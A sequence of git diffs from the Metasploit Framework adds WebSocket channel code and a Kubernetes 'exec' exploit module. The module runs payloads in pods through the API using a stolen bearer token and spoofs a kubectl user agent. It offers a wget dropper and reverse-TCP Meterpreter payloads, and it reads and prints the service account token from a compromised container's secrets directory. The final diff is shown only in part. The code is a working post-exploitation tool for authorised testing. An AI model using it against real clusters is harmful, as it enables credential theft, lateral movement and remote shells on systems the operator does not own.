--- a/lib/rex/proto/http/web_socket.rb
+++ b/lib/rex/proto/http/web_socket.rb
@@ -9,6 +9,16 @@ module WebSocket
 class WebSocketError < StandardError
 end
 
+class ConnectionError < WebSocketError
+  def initialize(msg: 'The WebSocket connection failed', http_response: nil)
+    @message = msg
+    @http_response = http_response
+  end
+
+  attr_accessor :message, :http_response
+  alias :to_s :message
+end
+
 # This defines the interface that the standard socket is extended with to provide WebSocket functionality. It should be
 # used on a socket when the server has already successfully handled a WebSocket upgrade request.
 module Interface

--- a/lib/rex/proto/http/web_socket.rb
+++ b/lib/rex/proto/http/web_socket.rb
@@ -10,6 +10,119 @@ class WebSocketError < StandardError
 end
 
 module Interface
+  class Channel
+    include Rex::Post::Channel::StreamAbstraction
+
+    module SocketInterface
+      include Rex::Post::Channel::SocketAbstraction::SocketInterface
+
+      def type?
+        'tcp'
+      end
+    end
+
+    attr_reader :params
+
+    def initialize(websocket, read_type: nil, write_type: :binary)
+      initialize_abstraction
+
+      # a read type of nil will handle both binary and text frames that are received
+      raise ArgumentError, 'read_type must be nil, :binary or :text' unless [nil, :binary, :text].include?(read_type)
+      raise ArgumentError, 'write_type must be :binary or :text' unless [:binary, :text].include?(write_type)
+      @websocket = websocket
+      @read_type = read_type
+      @write_type = write_type
+      @mutex = Mutex.new
+
+      # beware of: https://github.com/rapid7/rex-socket/issues/32
+      _, localhost, localport = websocket.getlocalname
+      _, peerhost, peerport = Socket.from_sockaddr(websocket.getpeername)
+      @params = Rex::Socket::Parameters.from_hash({
+        'LocalHost' => localhost,
+        'LocalPort' => localport,
+        'PeerHost' => peerhost,
+        'PeerPort' => peerport,
+        'SSL' => websocket.respond_to?(:sslctx) && !websocket.sslctx.nil?
+      })
+
+      @thread = Rex::ThreadFactory.spawn("WebSocketChannel(#{localhost}->#{peerhost})", false) do
+        websocket.wsloop do |data, data_type|
+          next unless @read_type.nil? || data_type == @read_type
+
+          data = on_data_read(data, data_type)
+          next if data.nil?
+
+          rsock.syswrite(data)
+        end
+
+        close
+      end
+
+      lsock.extend(SocketInterface)
+      lsock.channel = self
+
+      rsock.extend(SocketInterface)
+      rsock.channel = self
+    end
+
+    def closed?
+      @websocket.nil?
+    end
+
+    def close
+      @mutex.synchronize do
+        return if closed?
+
+        @websocket.wsclose
+        @websocket = nil
+      end
+
+      cleanup_abstraction
+    end
+
+    def close_write
+      if closed?
+        raise IOError, 'Channel has been closed.', caller
+      end
+
+      @websocket.put_wsframe(Frame.new(opcode: Opcode::CONNECTION_CLOSE))
+    end
+
+    #
+    # Write *buf* to the channel, optionally truncating it to *length* bytes.
+    #
+    # @param [String] buf The data to write to the channel.
+    # @param [Integer] length An optional length to truncate *data* to before
+    #   sending it.
+    def write(buf, length = nil)
+      if closed?
+        raise IOError, 'Channel has been closed.', caller
+      end
+
+      if !length.nil? && buf.length >= length
+        buf = buf[0..length]
+      end
+
+      length = buf.length
+      buf = on_data_write(buf)
+      if @write_type == :binary
+        @websocket.put_wsbinary(buf)
+      elsif @write_type == :text
+        @websocket.put_wstext(buf)
+      end
+
+      length
+    end
+
+    def on_data_read(data, _data_type)
+      data
+    end
+
+    def on_data_write(data)
+      data
+    end
+  end
+
   def put_wsframe(frame, opts={})
     put(frame.to_binary_s, opts=opts)
   end
@@ -28,8 +141,29 @@ module Interface
     nil
   end
 
+  def to_wschannel(**kwargs)
+    Channel.new(self, **kwargs)
+  end
+
+  def wsclose
+    return if closed? # there's nothing to do if the underlying TCP socket has already been closed
+
+    # this implementation doesn't handle the optional close reasons at all
+    frame = Frame.new(opcode: Opcode::CONNECTION_CLOSE)
+    # close frames must be masked
+    # see: https://datatracker.ietf.org/doc/html/rfc6455#section-5.5.1
+    frame.mask!
+    put_wsframe(frame)
+    while (frame = get_wsframe)
+      break if frame.opcode == Opcode::CONNECTION_CLOSE
+      # all other frames are dropped after our connection close request is sent
+    end
+
+    close # close the underlying TCP socket
+  end
+
   # Run a loop to handle data from the remote end of the websocket. The loop will automatically handle fragmentation
-  # (via continuation messages) and ping requests. When the remote connection is closed, the loop will exit. If
+  # unmasking payload data and ping requests. When the remote connection is closed, the loop will exit. If
   # specified the block will be passed data chunks and their data types.
   def wsloop(&block)
     buffer = ''
@@ -40,6 +174,8 @@ module Interface
 
       case frame.opcode
       when Opcode::CONNECTION_CLOSE
+        put_wsframe(Frame.new(opcode: Opcode::CONNECTION_CLOSE).tap { |f| f.mask! })
+        close
         break
       when Opcode::CONTINUATION
         # a continuation frame can only be sent for a data frames
@@ -47,20 +183,22 @@ module Interface
         raise WebSocketError, 'Received an unexpected continuation frame (uninitialized buffer)' if buffer_type.nil?
         buffer << frame.payload_data
       when Opcode::BINARY
-        raise WebSocketError, 'Received an unexpected binary frame (unfinished buffer)' unless buffer_type.nil?
+        raise WebSocketError, 'Received an unexpected binary frame (incomplete buffer)' unless buffer_type.nil?
         buffer = frame.payload_data
         buffer_type = :binary
       when Opcode::TEXT
-        raise WebSocketError, 'Received an unexpected text frame (unfinished buffer)' unless buffer_type.nil?
+        raise WebSocketError, 'Received an unexpected text frame (incomplete buffer)' unless buffer_type.nil?
         buffer = frame.payload_data
         buffer_type = :text
       when Opcode::PING
         # see: https://datatracker.ietf.org/doc/html/rfc6455#section-5.5.2
-        put_wsframe(frame.dup.tap { |pong| pong.opcode = Opcode::PONG })
+        put_wsframe(frame.dup.tap { |f| f.opcode = Opcode::PONG })
       end
 
       if frame.fin == 1
         if block_given?
+          # text data is UTF-8 encoded
+          # see: https://datatracker.ietf.org/doc/html/rfc6455#section-5.6
           buffer.force_encoding('UTF-8') if buffer_type == :text
           block.call(buffer, buffer_type)
         end
@@ -95,7 +233,7 @@ class Frame  < BinData::Record
   endian :big
   hide   :rsv1, :rsv2, :rsv3
 
-  bit1   :fin
+  bit1   :fin, initial_value: 1
   bit1   :rsv1
   bit1   :rsv2
   bit1   :rsv3
@@ -122,7 +260,7 @@ class Frame  < BinData::Record
         frame.mask!(mask)
       when FalseClass
       else
-        raise ArgumentError, 'mask must be true, false or an integer (literal mask key)'
+        raise ArgumentError, 'mask must be true, false or an integer (literal masking key)'
       end
 
       frame

--- a/lib/rex/proto/http/web_socket.rb
+++ b/lib/rex/proto/http/web_socket.rb
@@ -191,7 +191,13 @@ module Interface
   #
   # @return [WebSocket::Frame] the frame that was received from the peer.
   def get_wsframe(_opts={})
-    Frame.read(self)
+    # if this socket provides synchronization (as Rex::Io::Stream does), use it when reading a WebSocket frame which
+    # involves multiple calls to #read
+    if respond_to?(:synchronize_access)
+      synchronize_access { Frame.read(self) }
+    else
+      Frame.read(self)
+    end
   rescue EOFError
     nil
   end

--- a/lib/rex/proto/http/web_socket.rb
+++ b/lib/rex/proto/http/web_socket.rb
@@ -1,0 +1,105 @@
+# -*- coding: binary -*-
+require 'bindata'
+
+module Rex
+module Proto
+module Http
+module WebSocket
+
+module Interface
+  def put_wsframe(frame, opts={})
+    put(frame.to_binary_s, opts=opts)
+  end
+
+  def put_wsbinary(value, opts={})
+    put_wsframe(Frame.from_binary(value), opts=opts)
+  end
+
+  def put_wstext(value, opts={})
+    put_wsframe(Frame.from_text(value), opts=opts)
+  end
+
+  def get_wsframe(_opts={})
+    Frame.read(self)
+  rescue EOFError
+    nil
+  end
+end
+
+class Opcode < BinData::Bit4
+  ALL = {
+    0x0 => :Continuation,
+    0x1 => :Text,
+    0x2 => :Binary,
+    0x8 => :ConnectionClose,
+    0x9 => :Ping,
+    0xa => :Pong
+  }
+  ALL.each_pair { |val,sym| const_set(sym.to_s.gsub(/([a-z])([A-Z])/, '\1_\2').upcase, val) }
+  default_parameter assert: -> { ALL.keys.include?(value) }
+
+  def to_sym
+    ALL[value]
+  end
+end
+
+class Frame  < BinData::Record
+  endian :big
+  hide   :rsv1, :rsv2, :rsv3
+
+  bit1   :fin
+  bit1   :rsv1
+  bit1   :rsv2
+  bit1   :rsv3
+  opcode :opcode
+  bit1   :mask
+  bit7   :payload_len_sm
+  uint16 :payload_len_md, onlyif: -> { payload_len_sm == 126 }
+  uint64 :payload_len_lg, onlyif: -> { payload_len_sm == 127 }
+  uint32 :masking_key, onlyif: -> { mask == 1 }
+  string :payload_data, read_length: -> { payload_len }
+
+  def self.from_binary(value)
+    frame = Frame.new(opcode: Opcode::BINARY)
+    frame.payload_len = value.length
+    frame.payload_data = value
+    frame
+  end
+
+  def self.from_text(value)
+    frame = Frame.new(opcode: Opcode::TEXT)
+    frame.payload_len = value.length
+    frame.payload_data = value
+    frame
+  end
+
+  def payload_len
+    case payload_len_sm
+    when 127
+      payload_len_lg
+    when 126
+      payload_len_md
+    else
+      payload_len_sm
+    end
+  end
+
+  def payload_len=(value)
+    if value < 126
+      @payload_len_sm = value
+    elsif value < 0xffff
+      @payload_len_sm = 126
+      @payload_len_md = value
+    elsif value < 0x7fffffffffffffff
+      @payload_len_sm = 127
+      @payload_len_lg = value
+    else
+      raise ArgumentError, 'payload length is outside the acceptable range'
+    end
+  end
+end
+
+end
+end
+end
+end

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -1,0 +1,307 @@
+# -*- coding: binary -*-
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module Kubernetes
+  module Error
+    class ApiError < ::StandardError
+    end
+
+    class AuthenticationError < ApiError
+    end
+
+    class UnexpectedStatusCode < ApiError
+      attr_reader :status_code
+
+      def initialize(status_code)
+        super
+        @status_code = status_code
+      end
+    end
+  end
+
+  class Client
+    def initialize(config)
+      @http_client = config.fetch(:http_client)
+      @token = config[:token]
+    end
+
+    def exec_pod_capture(name, namespace, command, options = {}, &block)
+      # while kubectl uses SPDY/3.1, the Python client uses WebSockets over HTTP/1.1
+      # see: https://github.com/kubernetes/kubernetes/issues/7452
+      websocket = http_client.connect_ws(
+        request_options(
+          {
+            'method' => 'GET',
+            'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}/exec"),
+            'query' => build_query_string({
+              'command' => command,
+              'stdin' => false,
+              'stdout' => true,
+              'stderr' => true,
+              'tty' => false
+            }),
+            'headers' => {
+              'Sec-Websocket-Protocol' => 'v4.channel.k8s.io'
+            }
+          },
+          options
+        )
+      )
+
+      result = { error: {}, stdout: '', stderr: '' }
+      websocket.wsloop do |channel_data, _data_type|
+        next if channel_data.blank?
+
+        channel = channel_data[0].ord
+        channel_data = channel_data[1..-1]
+        case channel
+        when EXEC_CHANNEL_STDOUT
+          result[:stdout] << channel_data
+          block.call(channel_data, nil) if block_given?
+        when EXEC_CHANNEL_STDERR
+          result[:stderr] << channel_data
+          block.call(nil, channel_data) if block_given?
+        when EXEC_CHANNEL_ERROR
+          result[:error] = JSON(channel_data)
+        end
+      end
+
+      result
+    end
+
+    def list_namespace(options = {})
+      _res, json = call_api(
+        {
+          'method' => 'GET',
+          'uri' => http_client.normalize_uri('/api/v1/namespaces')
+        },
+        options
+      )
+
+      json
+    end
+
+    def list_pod(namespace, options = {})
+      _res, json = call_api(
+        {
+          'method' => 'GET',
+          'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods")
+        },
+        options
+      )
+
+      json
+    end
+
+    def create_pod(data, namespace, options = {})
+      res, json = call_api(
+        {
+          'method' => 'POST',
+          'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods"),
+          'data' => JSON.pretty_generate(data)
+        },
+        options
+      )
+
+      if res.code != 201
+        raise Kubernetes::Error::UnexpectedStatusCode, res.code
+      end
+
+      json
+    end
+
+    def delete_pod(name, namespace, options = {})
+      _res, json = call_api(
+        {
+          'method' => 'DELETE',
+          'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}"),
+          'headers' => {}
+        },
+        options
+      )
+
+      json
+    end
+
+    private
+
+    EXEC_CHANNEL_STDIN = 0
+    EXEC_CHANNEL_STDOUT = 1
+    EXEC_CHANNEL_STDERR = 2
+    EXEC_CHANNEL_ERROR = 3
+    EXEC_CHANNEL_RESIZE = 4
+
+    attr_reader :http_client
+
+    def build_query_string(query_vars)
+      qary = []
+      query_vars.each_pair do |key, val|
+        key = key.to_s
+
+        key = Rex::Text.uri_encode(key)
+        if val.is_a? Array
+          qary += val.map { |subval| "#{key}=#{Rex::Text.uri_encode(subval.to_s)}" }
+        else
+          qary << "#{key}=#{Rex::Text.uri_encode(val.to_s)}"
+        end
+      end
+
+      qary.join('&')
+    end
+
+    # TODO: Support receiving data directly as a table?
+    # Accept: application/json;as=Table;g=meta.k8s.io;v=v1beta1
+    # https://kubernetes.io/docs/reference/using-api/api-concepts/#receiving-resources-as-tables
+    def call_api(request, options = {})
+      res = http_client.send_request_raw(request_options(request, options))
+
+      if res.nil? || res.body.empty?
+        raise Kubernetes::Error::ApiError
+      elsif res.code == 401
+        raise Kubernetes::Error::AuthenticationError
+      end
+
+      json = res.get_json_document
+      if json.nil?
+        raise Kubernetes::Error::ApiError
+      end
+
+      [res, json.deep_symbolize_keys]
+    end
+
+    def request_options(request, options = {})
+      token = options.fetch(:token, @token)
+
+      request.merge(
+        {
+          'agent' => 'kubectl/v1.22.2 (linux/amd64) kubernetes/8b5a191',
+          'headers' => request.fetch('headers', {}).merge(
+            {
+              'Authorization' => "Bearer #{token}"
+            }
+          )
+        }
+      )
+    end
+  end
+end
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kubernetes exec',
+        'Description' => %q{
+          kubernetes
+
+          usage:
+
+          rerun session=-1 https://kubernetes.docker.internal:6443 verbose=true lhost=192.168.123.1
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+        ],
+        'References' => [
+          # ['URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
+        ],
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ ]
+        },
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Type' => :nix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              'Type' => :nix_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => 'wget',
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Python',
+            {
+              'Arch' => [ARCH_PYTHON],
+              'Platform' => 'python',
+              'Type' => :python,
+              'PAYLOAD' => 'python/meterpreter/reverse_tcp'
+            }
+          ]
+        ],
+        'DisclosureDate' => '2000-01-01', # FIXME: find an actual disclosure date
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('JwtToken', [ true, 'The JWT token' ]),
+        OptString.new('Pod', [ true, 'The pod name to execute in' ]),
+        OptString.new('Namespace', [true, 'The Kubernetes namespace', 'default' ])
+      ]
+    )
+  end
+
+  def check
+    # For the check command
+  end
+
+  def exploit
+    # Hack for now, running remotely versus compromised container
+    @kubernetes_client = Kubernetes::Client.new({ http_client: self, token: datastore['JwtToken'] })
+
+    case target['Type']
+    when :nix_cmd
+      execute_command(payload.encoded)
+    when :nix_dropper
+      execute_cmdstager
+    else
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    case target['Platform']
+    when 'python'
+      command = ['sh', '-c', "exec $(which python || which python3 || which python2) -c #{Shellwords.escape(cmd)}"]
+    else
+      command = ['sh', '-c', cmd]
+    end
+
+    result = @kubernetes_client.exec_pod_capture(datastore['Pod'], datastore['Namespace'], command) do |stdout, stderr|
+      print_status("STDOUT: #{stdout.strip}") unless stdout.blank?
+      print_error("STDERR: #{stderr.strip}") unless stderr.blank?
+    end
+
+    status = result&.dig(:error, 'status')
+    fail_with(Failure::Unknown, "Status: #{status || 'Unknown'}") unless status == 'Success'
+  end
+end

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -30,9 +30,13 @@ class MetasploitModule < Msf::Exploit
           # ['URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
         ],
         'Notes' => {
-          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK, # the Linux Dropper target uses the command stager which writes to disk
+            CONFIG_CHANGES, # the Kubernetes configuration is changed if a new pod is created
+            IOC_IN_LOGS # a log event is generated if a new pod is created
+          ],
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability' => [ ]
+          'Stability' => [ CRASH_SAFE ]
         },
         'DefaultOptions' => {
           'RPORT' => 8443,

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -5,6 +5,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'rex/proto/http/web_socket'
+
+# rubocop:disable Style/DoubleNegation
 module Kubernetes
   module Error
     class ApiError < ::StandardError
@@ -236,12 +239,15 @@ module Kubernetes
     end
   end
 end
+# rubocop:enable Style/DoubleNegation
 
-class MetasploitModule < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit
   Rank = ManualRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::PostMixin
+  include Msf::Post::File
 
   def initialize(info = {})
     super(
@@ -269,17 +275,18 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true
         },
         'Targets' => [
-          [ 'WebSocket Stream',
+          [
+            'WebSocket Stream',
             {
               'Arch' => ARCH_CMD,
               'Platform' => 'unix',
               'Type' => :nix_stream,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/interact',
+                'PAYLOAD' => 'cmd/unix/interact'
               },
               'Payload' => {
                 'Compat' => {
-                  'PayloadType'    => 'cmd_interact',
+                  'PayloadType' => 'cmd_interact',
                   'ConnectionType' => 'find'
                 }
               }
@@ -316,15 +323,20 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DisclosureDate' => '2000-01-01', # FIXME: find an actual disclosure date
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Platform' => [ 'linux', 'unix' ],
+        'SessionTypes' => [ 'meterpreter' ]
       )
     )
 
     register_options(
       [
-        OptString.new('Token', [ true, 'The JWT token' ]),
+        Opt::RHOSTS(nil, false),
+        Opt::RPORT(nil, false),
+        Msf::OptInt.new('SESSION', [ false, 'The session to run this module on.' ]),
+        OptString.new('Token', [ false, 'The JWT token' ]),
         OptString.new('Pod', [ true, 'The pod name to execute in' ]),
-        OptString.new('Namespace', [true, 'The Kubernetes namespace', 'default' ]),
+        OptString.new('Namespace', [ false, 'The Kubernetes namespace', 'default' ]),
         OptString.new('Shell', [true, 'The shell to use for execution', 'sh' ]),
       ]
     )
@@ -334,12 +346,84 @@ class MetasploitModule < Msf::Exploit::Remote
     # For the check command
   end
 
-  def exploit
-    @kubernetes_client = Kubernetes::Client.new({ http_client: self, token: datastore['Token'] })
+  def api_token
+    @api_token || datastore['TOKEN']
+  end
 
-    # todo:
-    #   * add ability to create a pod, from a configurable image
-    #   * add ability to be configured through an existing session
+  def rhost
+    @rhost || datastore['RHOST']
+  end
+
+  def rport
+    @rport || datastore['RPORT']
+  end
+
+  def namespace
+    @namespace || datastore['NAMESPACE']
+  end
+
+  def configure_via_session
+    vprint_status("Configuring options via session #{session.sid}")
+
+    unless directory?('/run/secrets/kubernetes.io')
+      # This would imply that the target is not a Kubernetes container
+      fail_with(Failure::NotFound, 'The kubernetes.io directory was not found')
+    end
+
+    if api_token.blank?
+      token = read_file('/run/secrets/kubernetes.io/serviceaccount/token')
+      fail_with(Failure::NotFound, 'The API token was not found, manually set the TOKEN option') if token.blank?
+
+      print_good("API Token: #{token}")
+      @api_token = token
+    end
+
+    if namespace.blank?
+      ns = read_file('/run/secrets/kubernetes.io/serviceaccount/namespace')
+      fail_with(Failure::NotFound, 'The namespace was not found, manually set the NAMESPACE option') if ns.blank?
+
+      print_good("Namespace: #{ns}")
+      @namespace = ns
+    end
+
+    service_host = service_port = nil
+    if rhost.blank?
+      service_host = get_env('KUBERNETES_SERVICE_HOST')
+      fail_with(Failure::NotFound, 'The KUBERNETES_SERVICE_HOST environment variable was not found, manually set the RHOSTS option') if service_host.blank?
+
+      @rhost = service_host
+    end
+
+    if rport.blank?
+      service_port = get_env('KUBERNETES_SERVICE_PORT')
+      fail_with(Failure::NotFound, 'The KUBERNETES_SERVICE_PORT environment variable was not found, manually set the RPORT option') if service_port.blank?
+
+      @rport = service_port.to_i
+    end
+
+    if service_host || service_port
+      service = "#{Rex::Socket.is_ipv6?(service_host) ? '[' + service_host + ']' : service_host}:#{service_port}"
+      print_good("Kubernetes service host: #{service}")
+    end
+  end
+
+  def connect_ws(opts = {})
+    opts['comm'] = session
+    opts['vhost'] = rhost
+    super
+  end
+
+  def exploit
+    if session
+      print_status("Routing traffic through session: #{session.sid}")
+      configure_via_session
+    end
+
+    validate_configuration!
+
+    @kubernetes_client = Kubernetes::Client.new({ http_client: self, token: api_token })
+
+    # TODO: add ability to create a pod, from a configurable image
 
     case target['Type']
     when :nix_stream
@@ -356,6 +440,11 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       execute_command(payload.encoded)
     end
+  rescue Rex::Proto::Http::WebSocket::ConnectionError => e
+    res = e.http_response
+    fail_with(Failure::Unreachable, e.message) if res.nil?
+    fail_with(Failure::NoAccess, 'Insufficient Kubernetes access') if res.code == 401 || res.code == 403
+    fail_with(Failure::Unknown, e.message)
   end
 
   def execute_command(cmd, _opts = {})
@@ -367,13 +456,21 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     result = @kubernetes_client.exec_pod_capture(datastore['Pod'], datastore['Namespace'], command) do |stdout, stderr|
-      print_status("STDOUT: #{stdout.strip}") unless stdout.blank?
-      print_error("STDERR: #{stderr.strip}") unless stderr.blank?
+      print_line(stdout) unless stdout.blank?
+      print_line(stderr) unless stderr.blank?
     end
 
     fail_with(Failure::Unknown, 'Failed to execute the command') if result.nil?
 
     status = result&.dig(:error, 'status')
     fail_with(Failure::Unknown, "Status: #{status || 'Unknown'}") unless status == 'Success'
+  end
+
+  def validate_configuration!
+    fail_with(Failure::BadConfig, 'Missing option: RHOSTS') if rhost.blank?
+    fail_with(Failure::BadConfig, 'Missing option: RPORT') if rport.blank?
+    fail_with(Failure::BadConfig, 'Invalid option: RPORT') unless rport.to_i > 0 && rport.to_i < 65536
+    fail_with(Failure::BadConfig, 'Missing option: TOKEN') if api_token.blank?
+    fail_with(Failure::BadConfig, 'Missing option: NAMESPACE') if namespace.blank?
   end
 end

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -24,12 +24,52 @@ module Kubernetes
   end
 
   class Client
+    USER_AGENT = 'kubectl/v1.22.2 (linux/amd64) kubernetes/8b5a191'.freeze
+
+    class ExecChannel < Rex::Proto::Http::WebSocket::Interface::Channel
+      attr_reader :error
+
+      def initialize(websocket)
+        @error = {}
+
+        super(websocket, write_type: :text)
+      end
+
+      def on_data_read(data, _data_type)
+        return data if data.blank?
+
+        exec_channel = data[0].ord
+        data = data[1..-1]
+        case exec_channel
+        when EXEC_CHANNEL_STDOUT
+          return data
+        when EXEC_CHANNEL_STDERR
+          return data
+        when EXEC_CHANNEL_ERROR
+          @error = JSON(data)
+        end
+
+        nil
+      end
+
+      def on_data_write(data)
+        EXEC_CHANNEL_STDIN.chr + data
+      end
+    end
+
     def initialize(config)
       @http_client = config.fetch(:http_client)
       @token = config[:token]
     end
 
-    def exec_pod_capture(name, namespace, command, options = {}, &block)
+    def exec_pod(name, namespace, command, options = {})
+      options = {
+        'stdin' => false,
+        'stdout' => true,
+        'stderr' => true,
+        'tty' => false
+      }.merge(options)
+
       # while kubectl uses SPDY/3.1, the Python client uses WebSockets over HTTP/1.1
       # see: https://github.com/kubernetes/kubernetes/issues/7452
       websocket = http_client.connect_ws(
@@ -39,10 +79,10 @@ module Kubernetes
             'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}/exec"),
             'query' => build_query_string({
               'command' => command,
-              'stdin' => false,
-              'stdout' => true,
-              'stderr' => true,
-              'tty' => false
+              'stdin' => !!options.delete('stdin'),
+              'stdout' => !!options.delete('stdout'),
+              'stderr' => !!options.delete('stderr'),
+              'tty' => !!options.delete('tty')
             }),
             'headers' => {
               'Sec-Websocket-Protocol' => 'v4.channel.k8s.io'
@@ -51,6 +91,12 @@ module Kubernetes
           options
         )
       )
+
+      websocket
+    end
+
+    def exec_pod_capture(name, namespace, command, options = {}, &block)
+      websocket = exec_pod(name, namespace, command, options)
 
       result = { error: {}, stdout: '', stderr: '' }
       websocket.wsloop do |channel_data, _data_type|
@@ -178,7 +224,7 @@ module Kubernetes
 
       request.merge(
         {
-          'agent' => 'kubectl/v1.22.2 (linux/amd64) kubernetes/8b5a191',
+          'agent' => USER_AGENT,
           'headers' => request.fetch('headers', {}).merge(
             {
               'Authorization' => "Bearer #{token}"
@@ -195,6 +241,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Auxiliary::CommandShell
 
   def initialize(info = {})
     super(
@@ -202,20 +249,16 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Kubernetes exec',
         'Description' => %q{
-          kubernetes
-
-          usage:
-
-          rerun session=-1 https://kubernetes.docker.internal:6443 verbose=true lhost=192.168.123.1
+          Execute a payload within a Kubernetes pod.
         },
         'License' => MSF_LICENSE,
         'Author' => [
+          'adfoster-r7',
+          'Spencer McIntyre'
         ],
         'References' => [
           # ['URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
         ],
-        'Stance' => Msf::Exploit::Stance::Aggressive,
-        'SessionTypes' => ['meterpreter'],
         'Notes' => {
           'SideEffects' => [ ARTIFACTS_ON_DISK ],
           'Reliability' => [ REPEATABLE_SESSION ],
@@ -226,6 +269,22 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true
         },
         'Targets' => [
+          [ 'WebSocket Stream',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Type' => :nix_stream,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/interact',
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType'    => 'cmd_interact',
+                  'ConnectionType' => 'find'
+                }
+              }
+            }
+          ],
           [
             'Unix Command',
             {
@@ -275,10 +334,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # Hack for now, running remotely versus compromised container
     @kubernetes_client = Kubernetes::Client.new({ http_client: self, token: datastore['JwtToken'] })
 
     case target['Type']
+    when :nix_stream
+      # Setting tty => true allows the shell prompt to be seen but it also causes commands to be echoed back
+      websocket = @kubernetes_client.exec_pod(datastore['Pod'], datastore['Namespace'], 'bash', 'stdin' => true, 'tty' => true)
+      channel = Kubernetes::Client::ExecChannel.new(websocket)
+      handler(channel.lsock)
     when :nix_cmd
       execute_command(payload.encoded)
     when :nix_dropper

--- a/modules/exploits/multi/kubernetes/exec.rb
+++ b/modules/exploits/multi/kubernetes/exec.rb
@@ -5,254 +5,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex/proto/http/web_socket'
-
-# rubocop:disable Style/DoubleNegation
-module Kubernetes
-  module Error
-    class ApiError < ::StandardError
-    end
-
-    class AuthenticationError < ApiError
-    end
-
-    class UnexpectedStatusCode < ApiError
-      attr_reader :status_code
-
-      def initialize(status_code)
-        super
-        @status_code = status_code
-      end
-    end
-  end
-
-  class Client
-    USER_AGENT = 'kubectl/v1.22.2 (linux/amd64) kubernetes/8b5a191'.freeze
-
-    class ExecChannel < Rex::Proto::Http::WebSocket::Interface::Channel
-      attr_reader :error
-
-      def initialize(websocket)
-        @error = {}
-
-        super(websocket, write_type: :text)
-      end
-
-      def on_data_read(data, _data_type)
-        return data if data.blank?
-
-        exec_channel = data[0].ord
-        data = data[1..-1]
-        case exec_channel
-        when EXEC_CHANNEL_STDOUT
-          return data
-        when EXEC_CHANNEL_STDERR
-          return data
-        when EXEC_CHANNEL_ERROR
-          @error = JSON(data)
-        end
-
-        nil
-      end
-
-      def on_data_write(data)
-        EXEC_CHANNEL_STDIN.chr + data
-      end
-    end
-
-    def initialize(config)
-      @http_client = config.fetch(:http_client)
-      @token = config[:token]
-    end
-
-    def exec_pod(name, namespace, command, options = {})
-      options = {
-        'stdin' => false,
-        'stdout' => true,
-        'stderr' => true,
-        'tty' => false
-      }.merge(options)
-
-      # while kubectl uses SPDY/3.1, the Python client uses WebSockets over HTTP/1.1
-      # see: https://github.com/kubernetes/kubernetes/issues/7452
-      websocket = http_client.connect_ws(
-        request_options(
-          {
-            'method' => 'GET',
-            'uri' => http_client.normalize_uri("/api/v1/namespaces/#{namespace}/pods/#{name}/exec"),
-            'query' => build_query_string({
-              'command' => command,
-              'stdin' => !!options.delete('stdin'),
-              'stdout' => !!options.delete('stdout'),
